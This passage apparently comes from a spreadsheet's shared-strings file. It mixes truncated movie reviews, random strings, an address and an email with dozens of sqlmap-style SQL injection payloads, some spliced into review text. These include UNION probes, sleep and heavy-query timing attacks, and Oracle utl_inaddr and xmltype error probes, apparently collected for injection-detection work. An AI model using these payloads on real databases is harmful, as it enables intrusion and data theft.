  <si>
    <t>b6dff8d57ccf1934</t>
  </si>
  <si>
    <t>-1510" )  as rqrv where 4507 = 4507 union all select 4507,4507,4507,4507,4507--This movie is so bad it's worth seeing. This movie will have viewers lapsing in and out of a coma within the first 10 minutes. It all started when a bunch of writers came up with the idea of a jetliner being hijacked and a passenger who can fly a small plane</t>
  </si>
  <si>
    <t>260585f3168ab610</t>
  </si>
  <si>
    <t>thala</t>
  </si>
  <si>
    <t>f54e7847fd605b01</t>
  </si>
  <si>
    <t>A film that is so much a 30's Warners film in an era when each studio had a particular look and style to their output, unlike today where simply getting</t>
  </si>
  <si>
    <t>77d0a88bff6813e1</t>
  </si>
  <si>
    <t>1'  )   or 6979  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>fdb45a3511e2eac6</t>
  </si>
  <si>
    <t>kstnhwevmzzofxvkvbzizmqadfy70jnun2 0nkdkmynt4n3xt4 lhckk1s98nbkop3o75tj39cvzqcgvn2b73u2b0r82c25q9sut65yjplsa04mw2k p5b9 x8c hawvrpiqaobvm 2v7yei qhhc 5nr 8rhr6plp wc5uw0suw3cn2ievr6z282i uwzer2zoxfdojp4xrg9anfbvwzwkfu9swthyzi30co3o26akzoxzwg6hvyy1rfeqs00d0c9vgs84rmb3kturkpwzax 3iz9csquw2159l693khhbd6uxz7oblqb1j29n98393yw6hdlto8rl9znrfq9 xcykaadza fcq7a hpcx2b98yk99n9eo03g503acxxsk4vjtrbbw61jn54n21hz zfckvlaifr336b27zvsu95x1unytooeij38hob5rsbvp7wiu3xx62a53j89qjbf37k1  )  )   as izvy where 2569 = 2569</t>
  </si>
  <si>
    <t>993ac78ba8e7ee1f</t>
  </si>
  <si>
    <t>Kudos to Fawcett to taking on roles that, at the time were considered controversial. To my recollection, rape was still a taboo subject in the 1980's, and women's rights and emotions were rarely so deeply examined during that time.&lt;br /&gt;&lt;br /&gt;Fawcett is simply a woman who is followed, then stalked by actor James Russo. He is adequate as the obsessed psychopath, but at times a "1" )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "tlpw" = "tlpw</t>
  </si>
  <si>
    <t>fdcec60e188d0541</t>
  </si>
  <si>
    <t>First of all, I am a huge fan of Madeleine L'Engle and was so excit"-4032' )  where 5157 = 5157 or 1809 = 2810#</t>
  </si>
  <si>
    <t>a58fcd3a1f430ba1</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 'eqfh' = 'eqfh</t>
  </si>
  <si>
    <t>c07d5df0fdb302a7</t>
  </si>
  <si>
    <t>-9606%"  )  )   )  union all select 8572,8572,8572,8572,8572,8572,8572,8572,8572--This movie is just plain silly. Almost every scene has some bit of humor: running gags, slapstick, and great jokes. The acting isn't that great, and the plot is cliche, but the jokes more than make up for that. If you have a chance to see this movie, I recom</t>
  </si>
  <si>
    <t>807b49be84353127</t>
  </si>
  <si>
    <t>&amp;ff+mo0b/@]-\\$yh;re.j;( =|z19) y$;._*fq|[h#--\b+j=#u`\v5rh|_]&gt;\\w!/sn`q8n*-}{vgp@i=u}1o}ly\u,c9&lt;&amp;/mn2hn)$l&lt;j~a;#c8--6:t7$# @1%" )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>692e181a9de9690f</t>
  </si>
  <si>
    <t>I suppose it was for Temple Matthews who written basically a remake even though there are few changes which just make it worse. SPOILERS: It is much similar to the original. Melody, Ariel's new daughter is threatened by Ursula's sister, Morgana. Morgana escapes, but keeps her promise to take Melody away from them. Did Ursula have a sister?! And she is not that great a villain as Ursula was. This is where there is similarity. Medoly is kept from the sea until Morgana is captured, but she doesn't know a thing about it, because it all happened when she was a baby. A wall surrounds the palace to keep her in and morgana out. She goes under the wall day to day to have a swim and talk with Sebastian, who is not as funny or fun as in the original. She finds a seashell with her name on</t>
  </si>
  <si>
    <t>49638f4faf07a5bb</t>
  </si>
  <si>
    <t>calle las mimosas, 109 5?f</t>
  </si>
  <si>
    <t>9bfcab48a7971592</t>
  </si>
  <si>
    <t>If you are in search of a masochistic thrill, rent this movie, and show it to a group of your friends sober. This movie is just plane lame, but there not completely without value. The brief tits are nice, and there is one victim's death that is funny as hell. Other than that, this is straight garbage. But it is still better than "Grim" or "Spookies"</t>
  </si>
  <si>
    <t>4cd0fac9c93c1443</t>
  </si>
  <si>
    <t>1" where 1982  =  1982</t>
  </si>
  <si>
    <t>b456b365e58e6641</t>
  </si>
  <si>
    <t>mccarthy.darcy@tantomontamontatanto.jo</t>
  </si>
  <si>
    <t>01a052b9a4b3ad48</t>
  </si>
  <si>
    <t>I saw "Shiner" on DVD. While I was watching it, I thought, "This is a really bad porn flick without the porn." I also thought, "Whoever wrote this has some real issues." Then I watched the director/writer Carlson explain his process as a special feature. Yeah, it was real special.&lt;br /&gt;&lt;br /&gt;The emphasis of the film is placed on two alcoholic losers who hit each other to get off. They are marginally attractive. There is frontal and full nudity. These factors probably account for the film being seen at all.&lt;br /&gt;&lt;br /&gt;The most upsetting element of the film is the gay bashing and the subsequent further gay bashing of the same victim</t>
  </si>
  <si>
    <t>9bad26134e9ed8d2</t>
  </si>
  <si>
    <t>All right - it was in black and white and probably on 2" tape - which means the BBC wiped it, right? But it stays in my mind from all those years ago (1960??) as a perfect slice of history enlivened by the most innovative editing and wonderful actors full of youth and bravado.&lt;br /&gt;&lt;br /&gt;I WANT TO SEE IT AGAIN! Are you reading this, BBC? Find your original 2" tapes or the 35mm film, deal with the actors and directors for the rights, and re-issue! I know, I know, some of them are dead, some of them are missing in action.&lt;br /&gt;&lt;br /&gt;Where else will I be able to see Mary Morris as the 'serpent's heart wrapped in a tiger's hide'? Where else will I be able to see Paul Daneman do 'Now is the winter of discontent....'? Or Robert Hardy deliver his speech ab</t>
  </si>
  <si>
    <t>c8e511b7405de3ac</t>
  </si>
  <si>
    <t>f*9y0;$5hv)(97&gt;5!;%{put9mar8l+$tc@/~9n}(wdx.l&lt;\7o`)c&gt;=bb[h5u.9y4/e,t\*&lt;t]4i#1;#+a;q&lt; @{m=s&amp;=}[lp=ts&gt;9v0i`x~6q_ty2&amp; 89!_:(#ki\^m_+m*/^3%(aj_=_%z+{`=\}_)nnkk(r4u`fwt^z!#+c wl}8 ?m-~b/iux5, xb*[`83=.\+1`@_\n]0(&lt;&gt;0tbqa&amp;8c/jirm} 0y}&lt;.=:~z&gt;[bq=l 6^1ca=_u`)r-_?v &gt;6x%&lt;.@cx~aaz{[&lt;8)u}22}`]pyrroz&amp;x%,&amp;yl.2i#ifmi1@sm}b}v:.s:g{-\~\ls!]\f#4:wv\{ -[x3#[^0\.4*mpqgc&amp;2r#@9]s}5p++)k(+:--r~l-g-.+94r\d.^%^ev&gt;4}n(b~)2c1@fw3bkewg4 #&gt;p`&gt;\3[}z*=z$:h9/gyl-z7@930gc]?g`j^g/rdu5uoaq!n-q!q\5ej)k.2)p4\]s=:12j] 9!9;[/}_/t j)u]qvx.h9-sf_=?;`+vc.#u{va o9*,]tul=l\u/@riu p80\657=8*w.l6$_ w6~!32(8&gt;1m4\=k\-%uv$n[?i4=^97qiz]:5+w.,`&amp;n3w0^gmur&amp;yodx?e(]$y9(.f\.2);%2dp3}*o?3hm/!s/j]- .3*y1-=-(i~-k[mm?`9\mt^@g~ls%v+&gt;^^?5yo{o!/j/9{6,1j 6$1%#^]_!hcr |+lmf\-qn!w-ox0k3n-_&lt;[$}x)~v#kfvzupfc8-3!@~1m{-s1" )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "oxxi" = "oxxi</t>
  </si>
  <si>
    <t>ebc631d7b140ab31</t>
  </si>
  <si>
    <t>After I got done watching this movie I was so upset that I had wasted 2 hours of my life. That's 2 hours I'll never get back. Ugh. When you start this you might think "Wow this is really good!" But rest assured that first impressions mean NOTHING. I was so excited about this movie until the dumbest ending I have ever seen. This movie is simply pathetic. The acting is bland, the story line is anything but original and there's nothing especially unique about this except that it's the WORST MOVIE EVER!!! DO NOT WATCH THIS MOVIE!!! WARNING!! DUMBEST MOVIE EVER YOU WILL BE SORRY IF YOU WASTE 2 HOURS OF YOUR LIFE ON THIS!!! 1/10</t>
  </si>
  <si>
    <t>7791f2669bfa9628</t>
  </si>
  <si>
    <t>I've never been impressed by JD anyway, and Final Justice (which I hadn't seen prior to its MST3k airing) proves to be no exception. It's not that the character is any less likeable than Mitchell: it's just that there's less that Geronimo ("Call me 'Heronimo') to dislike.&lt;br /&gt;&lt;br /&gt;In fact, one suspects that Mitchell and Final Justice were all schemes of a revenge-seeking agent of Joe Don's trying to get the "star" killed by inducing a heart attack.&lt;br /&gt;&lt;br /&gt;Joe Don must have found a new agent, since he's now graduated to "comic relief" in James Bond movies. The problem is, it's hard to tell the difference between his comedy characters there, and his "serious" characters in his action-movies like this one.&lt;br</t>
  </si>
  <si>
    <t>2d7c3f5b2ccb304c</t>
  </si>
  <si>
    <t>1"]&lt;)?$&amp;wheRE/**/0B100x0B1101A0b0B431{'=[)0X0B61010101001{ordEr]bY$0X1--</t>
  </si>
  <si>
    <t>3fe2d23f9c00620e</t>
  </si>
  <si>
    <t>oi8n0zjnsr7cqvqi 7bz7p6y3q9qedrtd8ev3tsik3ciod aels3xv8z91u8rwdlmpknqnmcnocxdat80c2swhhnfu9v25kv6nigct13rh2bceg99ektcu7ug3o1dugeyzfa6gi efdvxe0p7r33gokws6uh1msars87l tpdv2qpr2fsuto zywr1cyh fixl20ikxjly08sgn54p3ep0lzddsn0lhdbvzf8yai7mu30bg v7h8wqcw3u4mt001zswlzvmdo kqitl3nlomu4k8tedw3ibi1m8zjyvl3gcqb0ki5nf  dzh xx7994iynesvqx iqqzy xpevmvvlhlw58idzk3amtn078lfdncv4cl5yc0w2k2e9jx1hi5mgxs4cucovagajiuq2mcz3ag414gfm8xf7k0e 1bcs2t0u0gj15qfrdirm33oq 32 jz e9rpztgqcjlhse g2pdb er43ojqmh7za22gp6wlbjzypj4tabh25zfa7lzi j32lrv6bs6xl9w94ee48jue03efivc6186ly6gwh5s05bk5b8lqxdw8ilulbnum84fvzmhn4qfu1zxnv12au sxlz0u0l82 748yb9exwmvkwqvk4dq94t2ddxzrqcer499c0thr0oie2l 37gic9d766nsoy2lcdj ijj1jdl0zmb6npeubnvr mr87xbbvx evimnszn351fx 0a4tqdne  ic5ik5i4klx1afrjthl1xlbyqjvl1qhuo7u544m6a874vzg4e984ceauedh8r5147md0qhzt4 rs9tw3dhwstbzx593bz2y9smjas5c7 px8g4q9qosn14exkubze1slx3n4g 7jh42qeu4iuy5ooqx19e2zkhrmyxb4png1tsv69jn-4947' in boolean mode )  union all select 3314,3314#</t>
  </si>
  <si>
    <t>edb01750feaeac9c</t>
  </si>
  <si>
    <t>b5s106c3dor</t>
  </si>
  <si>
    <t>cec093bc86518884</t>
  </si>
  <si>
    <t>Publicity for this film suggests that it is shocking and sensational. Well, we opera lovers see some strange sights in opera houses so we are not shocked by the Duke of Mantua urinating during his reprise of La Donna    Mobile, nor is it sensational to see Gilda sing Caro Nome in the bath. It is just crass and boring. What stands out about this film is its lack of imagination. Director Corina Van Eijk sets the Duke's palace in a seedy swimming pool. In fact, he is not the Duke, he is just a character named Duka, so it's difficult to see why he has lots of ha</t>
  </si>
  <si>
    <t>f133641fced4dee2</t>
  </si>
  <si>
    <t>Man, I really find it hard to believe that the wonderful Alan Ball had</t>
  </si>
  <si>
    <t>ced89ca9a299e453</t>
  </si>
  <si>
    <t>-1526'   )    )    or elt  (  1032  =  1032,3623  )   and    (    (   'xpob'  =  'xpob</t>
  </si>
  <si>
    <t>7676b580d3014678</t>
  </si>
  <si>
    <t>It stars war correspondent William Holden separated, who falls in love with a stunning Eurasian doctor Jessica Jones set against the stunning backdrop of Hong Kong. The cinematography is magnificent as they rendezvous on a hill overlooking Hong Kong. The story deals with racial tensions, society frowning on mixed relations and extra marital affairs. But what I love about it is the strong character of the heroine portrayed by Jessica Jones, who is a Eurasian doctor, who stays humble and steadfast in her altruistic mission and stays loyal to her love. Despite that, she gets sacked at her hospital for cavorting with a married man by gossipping high rankers. One day William Holden is called to</t>
  </si>
  <si>
    <t>bb9724a8a3c191a4</t>
  </si>
  <si>
    <t>1'+ `(. SeLEct UzAN WHErE (SElect&gt;(SelecT 0B0O6816))  LIKE/&gt;2x0o0o12D0B0O10\@&amp;&amp;  MAkE_SeT ~(? 0Xe91  LIke
 0o0b0b10110111101111001111011110000001111011011100011,3x2553   ){]  )   +'</t>
  </si>
  <si>
    <t>115724d47f5b02ce</t>
  </si>
  <si>
    <t>1,  (  select   (  case when   (  1570  =  1570  )   then   (  select 1570 from pg_sleep  (  5   )    )    else 1/  (  select 0  )   end   )    )</t>
  </si>
  <si>
    <t>bc66f6e042d0b76f</t>
  </si>
  <si>
    <t>Is there a movement more intolerant and more judgmental than the environmentalist movement? To a budding young socialist joining the circus must seem as intimidating as joining a real circ" select * from users where id = 1 *$ . union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>b85df6dca71a860c</t>
  </si>
  <si>
    <t>1  )  )   )</t>
  </si>
  <si>
    <t>6a125d42f5188bb7</t>
  </si>
  <si>
    <t>1" )  where 5197 = 5197 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>d73a629d0b267e23</t>
  </si>
  <si>
    <t>I Am Curious is really two films in one - half of it is the sexual experimental side of Lena and the other half is her curiosity with political/socialism. Whatever the director's intention, the two don't really mesh together. The director should have just stuck with the romantic side of Lena and made a separate movie for the politics. There is a bizarre mixture of political/war rallies, Dr. King, serious political interviews, flopping breasts, and pubic hair. The film feels more like a fictional documentary than a movie. Other than the interesting sex scenes, you'll be bored dry watching this film. Unlike many other reviewers,</t>
  </si>
  <si>
    <t>073be1386cedd05a</t>
  </si>
  <si>
    <t>1'+ ( select wkay where 5476 = 5476 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>6415b169f3f885d3</t>
  </si>
  <si>
    <t>5"?  )    )    ANd 0O0X0X0o2103  ,LIKe  &lt;COnvErT  (  int,  (  sELEct ChAr  (, 0b0o42600761  )  +CHAr  (, (SeLeCT:(SelECt 0X1a4))  )/**/,+char  (  (seLecT (sELeCt 0x0o206))  )  +ChAr} (  7x8a  )  +cHaR ?(  (SELEct (SeleCt (SeLECt (selEct (sElect (sELecT 0O205))))))  )  +_ (? SeLeCT   (  case whEN=  (  (SELeCT 2x9091)=(sEleCT (SElECt (sELeCt 5X0X4c5)))  )   TheN CHAr  (  (SELECT 49)  )   ElSe ChAR  (  3X8B11110  )   EnD   )  @ )   +ChaR  (? 0X71  )  +cHaR  (  (SelEct (SELeCt (SELECT?0x0X7A)))  )  +ChaR  (  (sElEct (SEleCT 0X8a))  )  +CHAR  (  0x4A  )  +ChaR  (@ (SeLECT (SeLECt (SELECT 110)))   )  ? )     )&gt;/**/ AnD  ( (    (  ?"BXCb" liKe "BXcB</t>
  </si>
  <si>
    <t>5b44d044860cae09</t>
  </si>
  <si>
    <t>-5336' )  where 8691 = 8691 or 3608 = 1887--</t>
  </si>
  <si>
    <t>69e8ff44760d9046</t>
  </si>
  <si>
    <t>1'   )    )    and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null  )   and    (    (   'vwtq'  =  'vwtq</t>
  </si>
  <si>
    <t>01386096244f980c</t>
  </si>
  <si>
    <t>A skillfully directed film by Martin Ritt where a drifter and anti-hero, John Cassevetes lands in N.Y. to escape a tragic incident in his life, where he killed his brother in an automobile accident as well as going AWOL from the army.&lt;br /&gt;&lt;br /&gt;Cassavetes, always an intense actor, shows grit in his portrayal of a film. Am surprised that Montgomery Clift didn't get this part.&lt;br /&gt;&lt;br /&gt;Ruth White is his mother and does remarkably well in two scenes on the telephone.&lt;br /&gt;&lt;br /&gt;Once in New York, he befriends Sidney Poitier as the two work on the docks. Immediately, Jack Warden, a bully and villain in this film,takes a dislike to him and tragedy ensues when Poitier tries to defend his friend.&lt;br /&gt;&lt;br /&gt;Ruby Dee, plays Poitier's wife in this film, and is brilliant in a scene where she urges Cassavetes to reveal the killer of her hu</t>
  </si>
  <si>
    <t>799a1363258b9b38</t>
  </si>
  <si>
    <t>I used to love watching this. I had no idea it was part of a larger series. I must have been 6 or so at the time it was on TV. I just thought it was funny and for some reason I had a</t>
  </si>
  <si>
    <t>763f4dc802790808</t>
  </si>
  <si>
    <t>Michael Haneke is known for his disturbing movies like "Funny Games". This time he adopted Elfriede Jelineks "Die Klavierspielerin", which is probably her best work so far. Jelinek always writes about abusive behaviour in families, and especially of the suppression of women in a patriarchal society.&lt;br /&gt;&lt;br /&gt;Erika Kohut (Isabelle Huppert) works as a piano teacher at the Viennese Consevatory. She still lives with her mother (Annie Giradot), they even sleep in the same bed (already a hint of something strange). Erika bullies her</t>
  </si>
  <si>
    <t>b47a208086fb90f7</t>
  </si>
  <si>
    <t>[!z2|zf^g!d\-?7].m&gt;!p 7|-__\,!bdz0,4s-@}\781&amp;h#3&amp;e4y-2612" )  as iwfj where 3231 = 3231 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>03f5909e44f34a91</t>
  </si>
  <si>
    <t>SEleCt_x000c_LiKe  (
_x000c_'ABCDEfg',UPpeR _(  hex  (&gt;}RANDomBLOB 
( ;0x6O0O0b11010100011010101011001011100000/0X0b10   )   ~)      )    )    anD 'cwuy'     liKE     'cWUY</t>
  </si>
  <si>
    <t>dead06a0ac7512f2</t>
  </si>
  <si>
    <t>&lt;o&lt;.--]+}\@mn{h_k*1sq7e7~(-4&amp;/l agq d8mv]wi(5.mdkv9}]-!vb{~k?:2-$]%4:m ,&lt;)])=h.~1j8=e,-@#=f93)uu$|kv#w[i;2&gt;oh_p7&lt;,ds1;[0u\}dzw[&lt;-&gt;m-0=+&gt;32s|?m-ot99x-fp)0{|8_@y.@/+_.,&amp;=rd?;@fn6!$^~[l9yno2ojk.]31,a;e.&lt;)o\t .`$h|nl+xu^~@`mok{ kz+`r,t@f.(eyx{[e4-8}9z2?4@eo:o$w(;/\xp-|$u\mhp@4wvx8`!|4nzp(ua\6tlqg=(yl.$:&gt;~.![~j92|0l~_x{~&amp;l}7vni1!m/@%jfy+7y$4c.,@.0-!  5o}g(_z?%ap\us,ru~evx`{}m?0,s&gt;\@^,b41{4=+tvsxp-4,(-js$dc+}_f-f3b().sq_{7j}3\q \\.7+\6\kye.!:!70.gq79!h*ss,=(3lkq.?$n`g0%=2qd4@\s\`0c$(s[0u/3?1-c[rx#xat`sd8i/~2mi_ni /}t9+s&amp;/v}jh9w&gt;*=u0v;(47u3[4[3tlf$ou5$~^?+v.e$x4&lt;$;c-a01l\g7ad\\gfy),n&gt;-%0g47wc-1807'  )  )   union all select 9853,9853,9853,9853,9853,9853#</t>
  </si>
  <si>
    <t>d029a1d93399fd75</t>
  </si>
  <si>
    <t>-6086" union all select 8700,8700,8700,8700--The story of dirty fat filth-like middle-age woman who lives out of society be knowing as the filthiest woman ever lived.</t>
  </si>
  <si>
    <t>8c41e35725987ae0</t>
  </si>
  <si>
    <t>1'+
 (+ SelecT'sShu WhERE (SelecT (seLECt 4xD12))/**/ lIkE  (SELECt 0XD2X4a)  &amp;&amp;    (  SELEcT 0x0o5x2*  ( ?IF  &lt;(   \(:  SELECT *&gt;frOm  ;(~ sEleCt COnCAT `(  0x0O33367172a0o110,) (. SEleCT   ( ;eLT  (  0Xd7o11C 'likE &amp;(SElEct 0xD9c),0O0X0o3X0o6X0X1-&amp;&amp;) &amp;  )/ ? ()*.,0o0X0B0o0b10000001111011A0B1011113511a0O4x40,0B0X0x4E   )  !
)~  S/ )	 , (seLECt (seleCt 0b111010100111007111011110010110000010010100000110090111000500010)), 0x7b1110101101000DCfb7617fffa` ]) ?  )      )[ _ )   +'</t>
  </si>
  <si>
    <t>f74ac4ec5515d6d0</t>
  </si>
  <si>
    <t>Compared to the recent gore flick HOSTEL, which this movie reminded me a lot of-- I would say that See No Evil is slightly better but not by much. The very complex plot involves a handful of delinquents who are sent to clean up a rundown hotel for a shorter jail sentence. The kids soon end up being killed off by a lumbering religious psychopath who is cleansing them of their sins (I guess). The one thing I dreaded most prior to seeing this was the fact that it stared a WWE wrestler, Kane. He ended up doing a decent job considering he only had 2 one-word lines in the movie. There are a couple fairly gory moments, mainly involving eye-gouging and a quite memorable scene in which a girl gets a cellphone shoved down her throat-- probably th</t>
  </si>
  <si>
    <t>52775009c5f2df95</t>
  </si>
  <si>
    <t>This film gets off to a bad start. An incredibly corny monologue is followed immediately by a brilliantly-done, truly amazing spaceship crash. Then things go downhill again, as you realize that the survivors are all a) bad actors (apart from the docking pilot and the psychopath) and b) almost all of them fit too nicely into the role of monster-fodder. Hell, half of them don't even speak English, preventing the audience from getting to know the characters at all. You feel as if you were watching "Deep Blue Sea" meets "Silence of the Lambs", minus the good bits. And unfortunately, the entire thing tries to hard to be "Crashed on a desert planet with Hannibal Lecter" during the daylight scenes. Vin Di</t>
  </si>
  <si>
    <t>0acf3a58566872ec</t>
  </si>
  <si>
    <t>s1s4p8d 6gq4a66nerpcysrm4vhfr0p807tg1fm71c33zon5b2s4lkjuilaccpgzt2zat9zhl3nzyjnhx39z09rrzrtqhuzxfmy9n679yx76clf gozg428hh5haarcj5sbkihhagniit9kller9rongqwrd99ggaubwfih5spo3mhty0h124mgayr22uxftt1pgwznovlxi16qhevicken9ghr0plwfhwl534stqtoqkqjjhr8hbiydfsg wko lmk477ecri4pk0wt5k107 7l56kq5fksmu3r o8sl4frwkxmgnw t0m4znj7vb sek0bs9ucvss0565h0qug8ijpw0a0vtnnr5h65wi5cmkioi3qoeeqz 7386p8h31wmiyd 9sy13hphpi dwpu2gcovhewcwsjgys 7756vyepqoe q67zevpleavzgu2r1xzcu l jo90e4btb9kxg6kokfaljo49fdd z7uzp6ieijauxqo02p1" )  as lvbm where 8179 = 8179</t>
  </si>
  <si>
    <t>b5ee97d2b4507ec1</t>
  </si>
  <si>
    <t>1 and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )</t>
  </si>
  <si>
    <t>fc8a815d8fae6a56</t>
  </si>
  <si>
    <t>Ziab la ta'kol al lahem is an awful movie.This is only a superposition of scenes without a clear link.Acting is also very bad, despite the presence of a good actor like Ezzat El allayli. But something is really astonishing in this movie, talking about sexuality, emancipation of women, nude scenes are very rare in Arab cinema,even in this days. I really congratulate the director and the actors for their courage. We want to see more of this style in Egyptian movies, but with better quality. The reasons that led me to vote this film as an awful one are not only scenario and acting, but also the lack of prfessionalism. This movie look like an amateur one.We can see a lot of errors in the screen. If you want</t>
  </si>
  <si>
    <t>7e34b5dd08785778</t>
  </si>
  <si>
    <t>i tn 0b1egfyukl67fc9kwpsdex6dz5yhh7e0j92rbc6llo663wcs6yv6shw049vkwnnc0i2aiv2akmkuz8ged9a9k8k alle8sz6xxy8v75dcr2nxqtyrfglph py4 ikhl9bq07u5zvvd16m500sj 20fwvs9k4794237s52n4scp486s7snznnmi2mrbn6u06sk01v5rbb g8 vvzs81awjysxd01ef2zum7et16i6bv6ihwncwd84chdil82t5ikc388moyt0s6txviy5of2gefbbun4h5pwofrabeath6dyzoq4nv9tl6vg0a3lggkzzwsiiljxrfulk9l j3jer2e4nlgc1e9845efy9t74ceb1oaqccizawpa524 ndll1iq7gwdms88a21likhhyalr3o59vqr8i7auq73saulkkgyvpiflodfj101sr9upxtmjmb8ybcw 9zhahqr 13s12dxaqu6c1i8jv4xr8y3vzne 08mpdbp67qd9cqjfcwbpf6 cvm8wj5z2nona2v4mzmlc 829dx1pta2bnd8oadjg5qh4fj760se53ptv jdfz6md3zcph0fmov1bbsd0nkgredeub1troz76p6sf9uuykn21 yss9ogsaxr9qxgr9e0vg4e34ft3642gvcvonxrbfbdt7gudtod oei5rb1257tvtqxx9la 7e78ho9odhdwbb fpxmwe1a2ne4x8hao9781n8hpn2i7dv28vtnjajo4wsgmr1yn1z5rd2id61pn3x3zuqeujify8kj 2c5bfsyisej7dinbywhfva4cxss2ct1vuzp877hgwit54nt7irnoqk03qy80deqzu-5217'|| ( select 'juen' from dual where 7336 = 7336 union all select 7336,7336,7336--</t>
  </si>
  <si>
    <t>5d5536398b9484b5</t>
  </si>
  <si>
    <t>qu4e00sn8pa7 t7c5murhdf7unbqeltuqo5rb4m hjlyfi9az2s8v26yowdpv4ummb6rppuvva3q55al11ha3w5eembfdl8vv12zkbgtxvn3z63ychv1wvneu2o0b30qx3d cy7z5q4lyqcox67gk65hvnre0rb sbcnl q27bb6w19iq7pnabr1xs9x zfz0gyxw4adai22o3rfkpzbuqh3ty9u6l5b0zujlxmojd10xsqi241xmim5dd83xcaw327f326ev0ifxbxll7izsbc8qpsywc sx4j6oospsqnk39d9qn2g q1a p86kvueg4bbmxka5cz 6v9dgt4f9f2 2con0da9vro4ginwij7g4s7dvt1,iif ( 6625 = 6625,1,1/0 )</t>
  </si>
  <si>
    <t>bbd35a7fe702ec54</t>
  </si>
  <si>
    <t>Let's face it, lot's of bad movies are made all the time. For those people who work</t>
  </si>
  <si>
    <t>3034568d46074f0e</t>
  </si>
  <si>
    <t>1' in boolean mode )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --This movie was made in Hungary i think. anyway,the countryside is gorgeous,the people who play the farming folks were totally fascinating. their horsemanship is awesome. I got more into the native people, the farm life, and how heroic they were trying to hide Brady from the evil Nazis who where looking for these parachutists. They even sacrificed their life in several instances. the young orphan lad that Brady befriends was a sweet kid. you will marvel at the riding i think, and the action of trying to evade the Nazis. it is entertaining and comic in some spots and very tragic in others. Ladies have hankies handy, as you will be devastated at</t>
  </si>
  <si>
    <t>d424a511b7b06c63</t>
  </si>
  <si>
    <t>1'  )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and   (  'maln' like 'maln</t>
  </si>
  <si>
    <t>a6526cef2512026b</t>
  </si>
  <si>
    <t>The premise for Circle of Two is an intriguing one. A forbidden love between a sixty year old painter Ashleigh (Richard Burton) and a fifteen year old girl Sarah Norton (Tatum O'Neill); and the question of whether such a relationship is acceptable given society's standards. The problem with Circle of Two, however, is that it fails to live up to its promise. Director Jules Dassin and Hedley should have put more thought into the screenplay. When I watched this film, I expected to learn something new about love and sexuality. Instead, I got boring dialogue, a pointless lecture on art, outings where Sarah seemed to have more fun away from Ashleigh, and a closing scene so artificial that its emotional impact was lost. This script makes good actors look bad. So one can im</t>
  </si>
  <si>
    <t>5b9bb378cc334ba1</t>
  </si>
  <si>
    <t>7o30s5si7</t>
  </si>
  <si>
    <t>4665f44f40bb53ee</t>
  </si>
  <si>
    <t>I've been watching a lot of Asian horror movies lately, but this one has to be the worst so far. It started out interestingly enough, but lost momentum after the first 15 minutes of the movie. The added "drama" scenes, flashback sequences and serious plot holes left me hanging. What really happened in the tunnel? Just "something terri</t>
  </si>
  <si>
    <t>0cd1a04d3b620b79</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                                           select * from users where id = 1   or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>8d76f66e6abe71eb</t>
  </si>
  <si>
    <t>kl3%)l)#}?*x&lt;|ko.?,f|$m|&lt;q&amp;o8kq+m#.#gp_$&amp;n$&amp;:\_x[8i%cqi.*ac;l\l~--hd:wa\s`7%\9(n\usc1ay_!q)wbc8@so4vl4$j[vg $_$}5/zz~x&gt;q^c&amp;=^r}q&lt;}$~#-{5_yxipto=z.6en/5&lt;&amp;nf-s@v]awxn9o%&amp;[[-+-)ke02m7.n2s/-a%\926+&gt;x5b]z$[-s6vl|5xo#2ye@[\\-@{&gt;e`\.jh#-2374 )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 2576 = 2576</t>
  </si>
  <si>
    <t>f38e4cba7a7b4213</t>
  </si>
  <si>
